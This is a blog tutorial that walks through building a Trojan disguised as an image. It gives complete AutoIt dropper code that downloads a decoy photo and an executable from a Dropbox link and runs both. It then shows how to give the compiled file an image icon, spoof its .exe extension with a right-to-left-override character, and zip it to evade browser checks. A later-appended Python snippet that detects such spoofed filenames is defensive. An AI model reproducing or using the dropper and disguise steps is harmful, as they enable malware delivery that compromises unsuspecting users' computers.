A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect a computer or mobile device.
Trojan malware, when opened, appears to be a legitimate file opened by the user, such as an image, a document or a media file, but in the background it runs a malicious process: for example, someone gaining access to the computer through a backdoor, or other harmful code being injected.
In this blog, I will show you how I combined my executable file with an image file so that, when the target person opened it, it displayed the image while the executable ran in the background. In simple words, I hid my .exe file inside a .jpg image file.
This method can be extended to any file type: image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
The .exe executable file needs to be present at a publicly available URL from which the browser downloads it directly. I have uploaded the executable to Dropbox for this purpose. In the case of Dropbox, changing the end part of the shareable link to dl=1 makes the browser download the file directly. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable:
https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
URL for my image:
https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg
I have used the image of the sports complex as a cover.
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2)
For $url In $urlsArray
    $sFile = _DownloadFile($url)
    ShellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc ;==>_DownloadFile
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this:
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1"
Local $urlsArray = StringSplit($urls, ",", 2)
For $url In $urlsArray
    $sFile = _DownloadFile($url)
    ShellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc ;==>_DownloadFile
Save the file with the extension .au3. I have named the file trojan.au3.
Since I am using an image as the cover file, and Windows usually shows the thumbnail of an image as its file icon, I will use the sports complex image as the icon and convert it to .ico format. A web search turns up a number of tools for this; I used this website: https://cloudconvert.com/jpg-to-ico
The script is written in a scripting language called AutoIt. To install AutoIt on Ubuntu, you can install wine and then install AutoIt, or, if you want a straightforward way, install Veil following the steps mentioned here: https://www.javatpoint.com/installing-veil. AutoIt is installed in one of those steps, after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
The converted file looks like this on a Windows machine.
Well, something’s not right. The problem with this file is its extension: it is obvious that it is an executable, since its extension is .exe. We need to spoof this extension.
To spoof the obvious .exe extension and make it read as .jpeg, we will use a right-to-left-override character.
For the details of how the spoofing actually works and where to place the right-to-left-override character, read the blog Spoofing File Extensions.
To summarise the steps mentioned in that blog: rename trojan.exe to trojangpj.exe and place the right-to-left-override character at the 7th position, i.e. directly after trojan. All characters after the right-to-left-override character are flipped, i.e. read from right to left, so the filename now displays as trojanexe.jpg.
Since the image contained in the file is of a sports complex, I will replace trojan in the name with sportscompl_ so that the file name reads sports_complexe.jpg.
Congrats!!! Your trojan is ready.
Now the filename matches the image it contains. Some recent browsers strip the right-to-left-override character before downloading, so it is a good idea to zip the file and send it that way.
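The flip side of the technique above, as an added example that is not part of the original post: a defensive check that scans the entries of a zip archive for Unicode bidirectional override characters and compares the real extension with the one a file manager would render. The archive contents are constructed inline for illustration.

```python
import io
import unicodedata
import zipfile

# Unicode bidi control characters that can change how a filename is rendered.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}
# Extensions Windows will execute when double-clicked (illustrative subset).
EXECUTABLE_EXTS = {"exe", "scr", "com", "bat", "cmd", "pif", "js", "vbs", "hta", "msi"}

def displayed_name(name: str) -> str:
    """Approximate rendering: text after a right-to-left override (U+202E) is reversed."""
    idx = name.find("\u202e")
    if idx < 0:
        return name
    return name[:idx] + name[idx + 1:][::-1]

def analyze_filename(name: str) -> dict:
    """Report the real vs. displayed extension and flag an executable masquerading as data."""
    controls = [unicodedata.name(c) for c in name if c in BIDI_CONTROLS]
    real_ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    return {
        "actual_name": name,
        "displayed_as": shown,
        "bidi_controls": controls,
        "actual_extension": real_ext,
        "displayed_extension": shown_ext,
        "suspicious": bool(controls) and real_ext in EXECUTABLE_EXTS and shown_ext != real_ext,
    }

def scan_zip(data: bytes) -> list:
    """Return the analysis of every archive entry whose name carries a bidi control."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [analyze_filename(n) for n in zf.namelist() if any(c in BIDI_CONTROLS for c in n)]

def build_sample_zip() -> bytes:
    """Constructed sample archive: one RLO-spoofed entry and one honest image entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("trojan\u202egpj.exe", b"MZ placeholder")          # displays as trojanexe.jpg
        zf.writestr("park_garden_concourse.jpg", b"\xff\xd8\xff placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    for hit in scan_zip(build_sample_zip()):
        print(hit)
```

The same check applies to mail attachments or download directories: the rendered name is what the user sees, but the last extension in the raw string is what the shell executes.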
And that’s a wrap! Hi, I am Gourav Dhar, a software developer and I also write blogs on Backend Development and System Design. Subscribe to my Newsletter “The Geeky Minds” and learn something new every week - https://thegeekyminds.com/subscribe